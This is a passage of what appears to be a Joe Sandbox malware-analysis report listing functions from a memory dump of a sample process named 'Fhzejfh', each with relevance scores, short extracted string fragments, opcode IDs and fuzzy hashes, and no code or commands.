                                                                            • Instruction Fuzzy Hash: 41919D35A11619CFDB14DFB9E884AADB7B2BFC8304F55C529E005EB358DB34A902CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D75AEB Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 8fa9145ebcd21d78d0a7686884911ef73d1b0d44ca4c7c6cedd556e01f76e5bd
                                                                            • Instruction ID: da45466dc138c2197d70138d3beff8616d94de8985910b82fa4494476994acab
                                                                            • Opcode Fuzzy Hash: 8fa9145ebcd21d78d0a7686884911ef73d1b0d44ca4c7c6cedd556e01f76e5bd
                                                                            • Instruction Fuzzy Hash: 77917070E00619CFCB15DF69D880BADB7B2BF84304F29C569D019AB249E774AD85CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D76040 Relevance: .3, Instructions: 253COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f56f0f5fbb4751d1bb40d4c45c6785dfabda63b24d0714b46facf9c11849cb4f
                                                                            • Instruction ID: b3a39fe2e94e15e63bde460f816a4e636b10b0be1b02a742e471435c512516bc
                                                                            • Opcode Fuzzy Hash: f56f0f5fbb4751d1bb40d4c45c6785dfabda63b24d0714b46facf9c11849cb4f
                                                                            • Instruction Fuzzy Hash: 22915E36B106159FC714DB69D984B6EB7E3AFC8711F1AC068E409DB369EA34DC418BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D71210 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$TJeq$TJeq$Te`q
                                                                            • API String ID: 0-1111236950
                                                                            • Opcode ID: 2d8afbe840c88b85326e9509fd88c6a686eb20993ca90788223af1226f510b0d
                                                                            • Instruction ID: 2e9d37e0b24440b3a5a0d32cf76af975c0b28d80ecba4e00d4b9d5cc6905c1dc
                                                                            • Opcode Fuzzy Hash: 2d8afbe840c88b85326e9509fd88c6a686eb20993ca90788223af1226f510b0d
                                                                            • Instruction Fuzzy Hash: 04E17F38B042448FDB04DF6CC554BADBBF2AF49310F2585AAE44ADB3A2DA34DC458B61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7A360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d%fq$d%fq$$`q$$`q
                                                                            • API String ID: 0-3426633177
                                                                            • Opcode ID: 623811c3898784e911ba211a6e8c6e0c35d73b4dc28dc928f5c4d43ea6bdfe3a
                                                                            • Instruction ID: 198581ba64af149296f6256c2875c1901b42e703e6001161e5740575788a9ab0
                                                                            • Opcode Fuzzy Hash: 623811c3898784e911ba211a6e8c6e0c35d73b4dc28dc928f5c4d43ea6bdfe3a
                                                                            • Instruction Fuzzy Hash: B061D631B442118BC7189A7C495072E76E7BBC9320F26856AE50EDB3E5EA61CD4183F3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D727B1 Relevance: 5.2, Strings: 4, Instructions: 206COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d%fq$d%fq$$`q$$`q
                                                                            • API String ID: 0-3426633177
                                                                            • Opcode ID: da8d57540cd9fb6c0908d3d77a6d1371c1a65f52ac2bbba67ec9ed8c40969960
                                                                            • Instruction ID: a831a1a1178ff7a51cf7bc89135ba80657837639d03a60d763edcea8f41fb491
                                                                            • Opcode Fuzzy Hash: da8d57540cd9fb6c0908d3d77a6d1371c1a65f52ac2bbba67ec9ed8c40969960
                                                                            • Instruction Fuzzy Hash: D96103307042418BD7189A398D50B3A7BA7BF89310F29C56AD54ADB3E9EB31CD4187A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D72B34 Relevance: 5.2, Strings: 3, Instructions: 1437COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$$`q$$`q
                                                                            • API String ID: 0-49757582
                                                                            • Opcode ID: 8c6c1bcbc9b4673987b0fffd140c336e84456616dbc51d879f51d771f8914ecd
                                                                            • Instruction ID: c790638cca93a968c0b0a4cc19ee8d7acd34465684ee4a7e3780d786c80627ad
                                                                            • Opcode Fuzzy Hash: 8c6c1bcbc9b4673987b0fffd140c336e84456616dbc51d879f51d771f8914ecd
                                                                            • Instruction Fuzzy Hash: 13E2187A250110EFDB4A9F98D988D55BBB2FF4D32475A81D8F2099B232C732D861EF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D73D30 Relevance: 5.1, Strings: 3, Instructions: 1398COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$$`q$$`q
                                                                            • API String ID: 0-49757582
                                                                            • Opcode ID: c7e1f313783137ef4bd0aa9e7b4778ca23b16db8791b9839851189ce0f96510e
                                                                            • Instruction ID: 947ca194ad10bb52384820502b22ca635074859eb7db379d9d1fdaa30bebe53c
                                                                            • Opcode Fuzzy Hash: c7e1f313783137ef4bd0aa9e7b4778ca23b16db8791b9839851189ce0f96510e
                                                                            • Instruction Fuzzy Hash: 82D2177A250110EFDB4A9F98D988D55BBB2FF4D32475A81D8F2099B232C732D861EF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D73D60 Relevance: 5.1, Strings: 3, Instructions: 1395COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$$`q$$`q
                                                                            • API String ID: 0-49757582
                                                                            • Opcode ID: 488bc069f2566e977c755425de35751c25adbb0a107956e1b953aec8682b7cbf
                                                                            • Instruction ID: feb1e97076dc618204185520c63ba0318996f983e511a34a06e0ead893a8c84b
                                                                            • Opcode Fuzzy Hash: 488bc069f2566e977c755425de35751c25adbb0a107956e1b953aec8682b7cbf
                                                                            • Instruction Fuzzy Hash: FED2177A250110EFDB4A9F98D988D55BBB2FF4D32475A81D8F2099B232C732D861EF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74B47 Relevance: 3.8, Strings: 3, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: feq$ feq$4'`q
                                                                            • API String ID: 0-3260169214
                                                                            • Opcode ID: 3eba8c2a201b09a15368a9466093a044e301840a6f2f6f0903111e7f8003158e
                                                                            • Instruction ID: 97dc40007c6f22218a20b1e346ef0facbb8e933faec2a62e1ef30f819e38eabb
                                                                            • Opcode Fuzzy Hash: 3eba8c2a201b09a15368a9466093a044e301840a6f2f6f0903111e7f8003158e
                                                                            • Instruction Fuzzy Hash: FA317C7190024E9FCB04EFB8D9515EEBBB2FF88300F504569D119A7398DB355A45CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74B58 Relevance: 3.8, Strings: 3, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: feq$ feq$4'`q
                                                                            • API String ID: 0-3260169214
                                                                            • Opcode ID: 875cb860086a61c7cf0195bd994b3bc9f6840c63a87290d32a942941c6960ba3
                                                                            • Instruction ID: 621ca94bb50ca48c871f9a91ca1d65b59a1ca127339b0809883bd0c13a69ee75
                                                                            • Opcode Fuzzy Hash: 875cb860086a61c7cf0195bd994b3bc9f6840c63a87290d32a942941c6960ba3
                                                                            • Instruction Fuzzy Hash: AC212D71A0020E9FCB44EFB8D5515EEBBB2FF88300F504569D119A7398DB356A45CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7E088 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq$Hdq
                                                                            • API String ID: 0-3598684399
                                                                            • Opcode ID: f7d21d70b5c1a94fddd8bfccdf3cd1eb93783c005c5a9ca65939b2cab116992b
                                                                            • Instruction ID: f190dce93473e75111581d346639c0e9fc723961171af52cee24859e32394fd7
                                                                            • Opcode Fuzzy Hash: f7d21d70b5c1a94fddd8bfccdf3cd1eb93783c005c5a9ca65939b2cab116992b
                                                                            • Instruction Fuzzy Hash: B74101312047408FD724DF39D54425BBBE2AF88310F14CA6ED84ACB7A9EB74E9458BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D70A50 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q$Te`q
                                                                            • API String ID: 0-1723402877
                                                                            • Opcode ID: daefbde462c2c39efb889c6a6cc68d76173df274097039cff2bf39933f873e4c
                                                                            • Instruction ID: eadd4f5c1e42f297c097be5c9222b4ad45dc7a68ce03285dd353cfbd6426b572
                                                                            • Opcode Fuzzy Hash: daefbde462c2c39efb889c6a6cc68d76173df274097039cff2bf39933f873e4c
                                                                            • Instruction Fuzzy Hash: 62217470B002049FCB089FB9C9656AEBEF7BB88300F54446DE406E73E4DE758D4587A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D70A60 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q$Te`q
                                                                            • API String ID: 0-1723402877
                                                                            • Opcode ID: 8db8798a90c6122e2f8132d63acd2d1f565c362dfd6d36f6ef1e4439a5a6e9f8
                                                                            • Instruction ID: f6f3ba961442e2f41a412aa94bb926380716ac9e333e81f3fd6087ceac7697ff
                                                                            • Opcode Fuzzy Hash: 8db8798a90c6122e2f8132d63acd2d1f565c362dfd6d36f6ef1e4439a5a6e9f8
                                                                            • Instruction Fuzzy Hash: 93216270B002089FCB08AFB9C9656AEBEE7AB88700F50446DE406E73D4DE758D0587A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7FC20 Relevance: 1.7, Strings: 1, Instructions: 409COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: fbba5de4b953c4379709975669e307c6f2063adac04546343dbb244bb2aa8ba8
                                                                            • Instruction ID: 14db420edb22e1c1132b5d2b83321e84e4d11e5031de43c57ef32c35dd1ec3ee
                                                                            • Opcode Fuzzy Hash: fbba5de4b953c4379709975669e307c6f2063adac04546343dbb244bb2aa8ba8
                                                                            • Instruction Fuzzy Hash: 06719175B006099FCB25DF68D8446AEBBF2FFC8310F14852AE51AD7750EB34AD418B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D741D4 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq
                                                                            • API String ID: 0-665751991
                                                                            • Opcode ID: fc41a189cc2310a2b5b42f8b69ebc52f15979d4ce6b5448bf9e50e429b7b298b
                                                                            • Instruction ID: ef5b7a506223952f2eb4bd1c12e5696f0ef8d61cb7b8cdd5de8651c30b268ec2
                                                                            • Opcode Fuzzy Hash: fc41a189cc2310a2b5b42f8b69ebc52f15979d4ce6b5448bf9e50e429b7b298b
                                                                            • Instruction Fuzzy Hash: 1351F5307042409FCB25DF78C845A9E7BB2AF49320F1486ADE559CB3E2DB31A806CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74220 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq
                                                                            • API String ID: 0-665751991
                                                                            • Opcode ID: 416db344c201597dcd49bd0ba71dde24c8675938df7ff705e4dde8d382492521
                                                                            • Instruction ID: 19c457f85509c36380d3d78f4d35c2f9d08699a7cfeabf8be593a305e388a672
                                                                            • Opcode Fuzzy Hash: 416db344c201597dcd49bd0ba71dde24c8675938df7ff705e4dde8d382492521
                                                                            • Instruction Fuzzy Hash: BA515A357006109FCB24EF68C844A5EB7F2BF49724F258699E529DB3A1DB30AC05CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7C98F Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: c1fafac7fc650fb620b0ab07d41ade389440595d1dd415e20dce44d0686a21dc
                                                                            • Instruction ID: 747719d070da211e09d66270e0e0c393954c862157c8072f0c6bd3f63606bc7b
                                                                            • Opcode Fuzzy Hash: c1fafac7fc650fb620b0ab07d41ade389440595d1dd415e20dce44d0686a21dc
                                                                            • Instruction Fuzzy Hash: 0741D5317142049FDB009B69D859A5A7FF6EF89711F15C0AAF10ACB3B2DA70DC0287B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7E690 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: a076863321ef7ccc4c591b68eded825eebc22781f92a03098618dbd5959c236d
                                                                            • Instruction ID: ddfb415597f5c8439fbd94624258b9e55a9e704b24525b94222ac27d93baa37d
                                                                            • Opcode Fuzzy Hash: a076863321ef7ccc4c591b68eded825eebc22781f92a03098618dbd5959c236d
                                                                            • Instruction Fuzzy Hash: BF418A35A006168FCB04DF68C484A6AFBB1FF49320F258699D5299B391E730FD52CBE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7D6D3 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pdq
                                                                            • API String ID: 0-3193970922
                                                                            • Opcode ID: b6f02bfebf3af1bf78a8dee34dd9bbacdad0c35d82c8b871ec49677639d9b7ab
                                                                            • Instruction ID: b828538a5baca8d7bae1f78a8cd41d5a9a9924a41ac853cec8a3bd90b04794d8
                                                                            • Opcode Fuzzy Hash: b6f02bfebf3af1bf78a8dee34dd9bbacdad0c35d82c8b871ec49677639d9b7ab
                                                                            • Instruction Fuzzy Hash: 3B41DA76600100AFCB4A9F98D944D597FB7FF8D32471A8094E2099B376DB36DC21EB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7DF00 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: c4082cd8e57ccba6c04ba4cfc57c2b4d58b9d6f8854e2a10daedf33274ef5863
                                                                            • Instruction ID: 0e9f5bb5379e5d735c3f900676121e924447fe428184b7c83f66bcd7000a3306
                                                                            • Opcode Fuzzy Hash: c4082cd8e57ccba6c04ba4cfc57c2b4d58b9d6f8854e2a10daedf33274ef5863
                                                                            • Instruction Fuzzy Hash: 473148363042815FDB155F68E8405AA7F72EFD6330B4581BAF509CB3A5EE318C06C3A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7D6D8 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pdq
                                                                            • API String ID: 0-3193970922
                                                                            • Opcode ID: b2c359f3d9162e27cd59abfa25a038803067ecb0fdef5d0008eec241e4a4b72d
                                                                            • Instruction ID: a0ae8043ef23c9d8a01466f05e9b9f8ef3aef56a15b2261d1bb939d14253d980
                                                                            • Opcode Fuzzy Hash: b2c359f3d9162e27cd59abfa25a038803067ecb0fdef5d0008eec241e4a4b72d
                                                                            • Instruction Fuzzy Hash: 4041D976600100AFCB4A9F98D944D597FB7FF8D32471A8098E2099B376DB36DC21EB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D763B0 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \s`q
                                                                            • API String ID: 0-3034026754
                                                                            • Opcode ID: 4f022ea62e4e5178ac0efab5332f91fb12aa3bb6fd57bab35adb870e38099f02
                                                                            • Instruction ID: b32ab77f8a319fee1cff1800056c956bd631299c03fbd7f14a058d483864dbc4
                                                                            • Opcode Fuzzy Hash: 4f022ea62e4e5178ac0efab5332f91fb12aa3bb6fd57bab35adb870e38099f02
                                                                            • Instruction Fuzzy Hash: FD21D5323449204FC769DB7DD9549297BF5EF8976430980BAE40ECB371FA21DC0187A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D77AE8 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 7f3e71f4eedf3fb8bf08ee0df6fbced3b363c29a335498d82dc19b40c74d9cc6
                                                                            • Instruction ID: a6d4507f22df1868ab0797b41cb3f281b5116afc94aed991e4458eca564c9a37
                                                                            • Opcode Fuzzy Hash: 7f3e71f4eedf3fb8bf08ee0df6fbced3b363c29a335498d82dc19b40c74d9cc6
                                                                            • Instruction Fuzzy Hash: B531E635B04215CFDB04DFA8C959AADB7B2BF88714F204469E40ADB3A4DB719D02CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D71548 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: f12be47900f5edea5fdbe03f75f6a3db009354e327dce9e9513702d17ee3ef3d
                                                                            • Instruction ID: 72999d0a96adc39df5b1c2c024db5f0c847b2e6aa191294d7f839ad10ba25d2e
                                                                            • Opcode Fuzzy Hash: f12be47900f5edea5fdbe03f75f6a3db009354e327dce9e9513702d17ee3ef3d
                                                                            • Instruction Fuzzy Hash: 2231F878B00214CFDB18DBA8D859BADB7B1BF88705F148159E40ADB3A5EB71DC01CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7C490 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: b71c73226619dacdca5d0eff23a499b40293145a34c4d19a82d1d6efe2602d70
                                                                            • Instruction ID: a9c3ab12282ebb86ad4deb90028e06af142d742aca0a270e881673f4f9aca397
                                                                            • Opcode Fuzzy Hash: b71c73226619dacdca5d0eff23a499b40293145a34c4d19a82d1d6efe2602d70
                                                                            • Instruction Fuzzy Hash: 7D21A531B501148FCB049B68D925BAEBBF6AFC8B10F20005AE106DB3A4DFB1DD018BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7C480 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: ac67ff90c14742bc33acf8901e75479a28055f187387a259643b03f18eb95ae7
                                                                            • Instruction ID: 99b575bc3f83ca14323aa6f28101d4c2f3047d4311568b662ea9cefcbb0e42e7
                                                                            • Opcode Fuzzy Hash: ac67ff90c14742bc33acf8901e75479a28055f187387a259643b03f18eb95ae7
                                                                            • Instruction Fuzzy Hash: BF219331B101148FD7149B68D865BAEBBE6AF89700F24405DE106DB3A4DEB19D0287E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D74859 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $`q
                                                                            • API String ID: 0-1457833287
                                                                            • Opcode ID: bcb5a153f5187c92c43e0590fc24048efc177d2ed7ca961e6bbc502049085d3a
                                                                            • Instruction ID: 1de6e4d00851d91554c6a308ad0042ef39e082440ec94d9d73a12e1809bfb1f9
                                                                            • Opcode Fuzzy Hash: bcb5a153f5187c92c43e0590fc24048efc177d2ed7ca961e6bbc502049085d3a
                                                                            • Instruction Fuzzy Hash: 70014C71E042498FCB55DFB9A5456ADBBB1BB88311F2981ABC51CD7221F7308A41CBE2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00D7CA60 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000024.00000002.472453302.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_36_2_d70000_Fhzejfh.jbxd
                                                                            Similarity
                                                                            • API ID:
